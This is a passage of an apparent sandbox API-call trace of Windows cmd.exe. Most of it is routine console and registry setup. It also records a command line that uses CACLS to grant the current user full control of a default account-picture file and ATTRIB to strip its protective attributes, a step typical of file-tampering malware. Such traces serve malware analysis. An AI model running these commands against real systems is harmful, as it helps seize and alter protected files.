dwLength=0x1c | out: lpBuffer=0x30f7a4*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0183.179] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30f7a4, dwLength=0x1c | out: lpBuffer=0x30f7a4*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0183.179] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30f7a4, dwLength=0x1c | out: lpBuffer=0x30f7a4*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0183.179] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30f7a4, dwLength=0x1c | out: lpBuffer=0x30f7a4*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0183.179] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30f7a4, dwLength=0x1c | out: lpBuffer=0x30f7a4*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0183.179] GetConsoleOutputCP () returned 0x1b5 [0183.179] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0183.180] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0183.180] _get_osfhandle (_FileHandle=1) returned 0x7 [0183.180] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0183.180] _get_osfhandle (_FileHandle=1) returned 0x7 [0183.180] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0183.180] _get_osfhandle (_FileHandle=1) returned 0x7 [0183.180] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0183.180] _get_osfhandle (_FileHandle=0) returned 0x3 [0183.180] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0183.180] _get_osfhandle (_FileHandle=0) returned 0x3 [0183.181] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0183.181] GetEnvironmentStringsW () returned 0xa0308* [0183.181] FreeEnvironmentStringsW (penv=0xa0308) returned 1 [0183.181] GetEnvironmentStringsW () returned 0xa0308* [0183.181] FreeEnvironmentStringsW (penv=0xa0308) returned 1 [0183.181] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e744 | out: phkResult=0x30e744*=0x40) returned 0x0 [0183.181] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e74c, lpData=0x30e750, lpcbData=0x30e748*=0x1000 | out: lpType=0x30e74c*=0x0, lpData=0x30e750*=0xb8, lpcbData=0x30e748*=0x1000) returned 0x2 [0183.181] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e74c, lpData=0x30e750, lpcbData=0x30e748*=0x1000 | out: lpType=0x30e74c*=0x4, lpData=0x30e750*=0x1, lpcbData=0x30e748*=0x4) returned 0x0 [0183.181] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e74c, lpData=0x30e750, lpcbData=0x30e748*=0x1000 | out: lpType=0x30e74c*=0x0, lpData=0x30e750*=0x1, lpcbData=0x30e748*=0x1000) returned 0x2 [0183.181] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e74c, lpData=0x30e750, lpcbData=0x30e748*=0x1000 | out: lpType=0x30e74c*=0x4, lpData=0x30e750*=0x0, lpcbData=0x30e748*=0x4) returned 0x0 [0183.181] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e74c, lpData=0x30e750, lpcbData=0x30e748*=0x1000 | out: lpType=0x30e74c*=0x4, lpData=0x30e750*=0x40, lpcbData=0x30e748*=0x4) returned 0x0 [0183.181] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e74c, lpData=0x30e750, lpcbData=0x30e748*=0x1000 | out: lpType=0x30e74c*=0x4, lpData=0x30e750*=0x40, lpcbData=0x30e748*=0x4) returned 0x0 [0183.182] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e74c, lpData=0x30e750, lpcbData=0x30e748*=0x1000 | out: lpType=0x30e74c*=0x0, lpData=0x30e750*=0x40, lpcbData=0x30e748*=0x1000) returned 0x2 [0183.182] RegCloseKey (hKey=0x40) returned 0x0 [0183.182] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e744 | out: phkResult=0x30e744*=0x40) returned 0x0 [0183.182] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e74c, lpData=0x30e750, lpcbData=0x30e748*=0x1000 | out: lpType=0x30e74c*=0x0, lpData=0x30e750*=0x40, lpcbData=0x30e748*=0x1000) returned 0x2 [0183.182] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e74c, lpData=0x30e750, lpcbData=0x30e748*=0x1000 | out: lpType=0x30e74c*=0x4, lpData=0x30e750*=0x1, lpcbData=0x30e748*=0x4) returned 0x0 [0183.182] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e74c, lpData=0x30e750, lpcbData=0x30e748*=0x1000 | out: lpType=0x30e74c*=0x0, lpData=0x30e750*=0x1, lpcbData=0x30e748*=0x1000) returned 0x2 [0183.182] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e74c, lpData=0x30e750, lpcbData=0x30e748*=0x1000 | out: lpType=0x30e74c*=0x4, lpData=0x30e750*=0x0, lpcbData=0x30e748*=0x4) returned 0x0 [0183.182] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e74c, lpData=0x30e750, lpcbData=0x30e748*=0x1000 | out: lpType=0x30e74c*=0x4, lpData=0x30e750*=0x9, lpcbData=0x30e748*=0x4) returned 0x0 [0183.182] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e74c, lpData=0x30e750, lpcbData=0x30e748*=0x1000 | out: lpType=0x30e74c*=0x4, lpData=0x30e750*=0x9, lpcbData=0x30e748*=0x4) returned 0x0 [0183.182] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e74c, lpData=0x30e750, lpcbData=0x30e748*=0x1000 | out: lpType=0x30e74c*=0x0, lpData=0x30e750*=0x9, lpcbData=0x30e748*=0x1000) returned 0x2 [0183.182] RegCloseKey (hKey=0x40) returned 0x0 [0183.182] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886391 [0183.182] srand (_Seed=0x5b886391) [0183.182] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\"" [0183.182] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\"" [0183.182] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0183.183] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xa1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0183.183] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0183.183] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0183.183] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0183.183] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0183.183] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0183.183] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0183.183] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0183.183] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0183.183] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0183.183] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0183.183] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0183.183] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0183.184] GetEnvironmentStringsW () returned 0xa2458* [0183.184] FreeEnvironmentStringsW (penv=0xa2458) returned 1 [0183.184] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.184] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0183.184] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0183.184] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0183.184] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0183.184] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0183.184] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0183.184] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0183.184] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0183.184] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0183.184] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f510 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0183.184] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f510, lpFilePart=0x30f50c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f50c*="Desktop") returned 0x18 [0183.184] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0183.185] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f28c | out: lpFindFileData=0x30f28c) returned 0xa0ae8 [0183.185] FindClose (in: hFindFile=0xa0ae8 | out: hFindFile=0xa0ae8) returned 1 [0183.185] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f28c | out: lpFindFileData=0x30f28c) returned 0xa0ae8 [0183.185] FindClose (in: hFindFile=0xa0ae8 | out: hFindFile=0xa0ae8) returned 1 [0183.185] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f28c | out: lpFindFileData=0x30f28c) returned 0xa0ae8 [0183.185] FindClose (in: hFindFile=0xa0ae8 | out: hFindFile=0xa0ae8) returned 1 [0183.185] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0183.185] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0183.185] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0183.185] GetEnvironmentStringsW () returned 0xa0308* [0183.185] FreeEnvironmentStringsW (penv=0xa0308) returned 1 [0183.185] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0183.186] GetConsoleOutputCP () returned 0x1b5 [0183.186] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0183.186] GetUserDefaultLCID () returned 0x409 [0183.190] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0183.191] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30f650, cchData=128 | out: lpLCData="0") returned 2 [0183.191] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30f650, cchData=128 | out: lpLCData="0") returned 2 [0183.191] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30f650, cchData=128 | out: lpLCData="1") returned 2 [0183.191] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0183.191] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0183.191] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0183.191] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0183.191] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0183.191] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0183.191] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0183.191] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0183.191] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0183.191] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0183.191] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0183.192] GetConsoleTitleW (in: lpConsoleTitle=0x909b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.212] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0183.212] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0183.213] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0183.213] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0183.214] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0183.215] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0183.215] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0183.215] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0183.215] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0183.215] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0183.215] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0183.215] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0183.263] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0183.264] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0183.264] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0183.264] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0183.264] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0183.264] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0183.264] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0183.266] GetConsoleTitleW (in: lpConsoleTitle=0x30f2e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.266] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0183.266] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0183.266] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0183.266] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0183.266] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0183.266] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0183.266] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0183.266] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0183.266] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0183.267] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0183.267] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0183.267] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0183.267] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0183.267] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0183.267] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0183.267] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0183.267] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0183.267] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0183.267] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0183.267] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0183.267] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0183.267] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0183.267] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0183.267] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0183.267] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0183.267] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0183.267] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0183.267] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0183.267] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0183.267] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0183.267] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0183.267] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0183.267] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0183.267] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0183.267] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0183.267] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0183.267] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0183.267] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0183.267] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0183.267] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0183.267] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0183.267] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0183.267] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0183.267] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0183.267] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0183.267] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0183.267] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0183.267] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0183.267] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0183.267] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0183.267] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0183.267] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0183.267] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0183.267] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0183.267] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0183.267] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0183.268] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0183.268] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0183.268] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0183.268] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0183.268] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0183.268] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0183.268] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0183.268] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0183.268] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0183.268] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0183.268] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0183.268] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0183.268] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0183.268] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0183.268] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0183.268] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0183.268] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0183.268] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0183.268] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0183.268] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0183.268] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0183.268] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0183.268] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0183.268] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0183.268] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0183.268] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0183.268] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0183.268] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0183.268] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0183.268] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0183.268] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0183.268] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0183.269] SetErrorMode (uMode=0x0) returned 0x0 [0183.269] SetErrorMode (uMode=0x1) returned 0x0 [0183.269] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xa1e98, lpFilePart=0x30ee04 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30ee04*="Desktop") returned 0x18 [0183.269] SetErrorMode (uMode=0x0) returned 0x1 [0183.269] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0183.269] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0183.274] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0183.275] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x30eb80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eb80) returned 0xffffffff [0183.275] GetLastError () returned 0x2 [0183.275] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x30eb80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eb80) returned 0xffffffff [0183.275] GetLastError () returned 0x2 [0183.275] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x30eb80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eb80) returned 0xa2180 [0183.276] FindClose (in: hFindFile=0xa2180 | out: hFindFile=0xa2180) returned 1 [0183.276] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x30eb80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eb80) returned 0xffffffff [0183.297] GetLastError () returned 0x2 [0183.297] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x30eb80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eb80) returned 0xa2180 [0183.297] FindClose (in: hFindFile=0xa2180 | out: hFindFile=0xa2180) returned 1 [0183.298] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0183.322] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0183.322] GetConsoleTitleW (in: lpConsoleTitle=0x30f078, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.322] InitializeProcThreadAttributeList (in: lpAttributeList=0x30ef00, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30efc8 | out: lpAttributeList=0x30ef00, lpSize=0x30efc8) returned 1 [0183.322] UpdateProcThreadAttribute (in: lpAttributeList=0x30ef00, dwFlags=0x0, Attribute=0x60001, lpValue=0x30efc0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30ef00, lpPreviousValue=0x0) returned 1 [0183.322] GetStartupInfoW (in: lpStartupInfo=0x30eebc | out: lpStartupInfo=0x30eebc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0183.322] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0183.323] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30ef5c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30efa8 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x30efa8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xfe4, dwThreadId=0xfe0)) returned 1 [0183.326] CloseHandle (hObject=0x4c) returned 1 [0183.326] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0183.326] GetEnvironmentStringsW () returned 0xa0308* [0183.326] FreeEnvironmentStringsW (penv=0xa0308) returned 1 [0183.326] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0183.600] GetExitCodeProcess (in: hProcess=0x50, 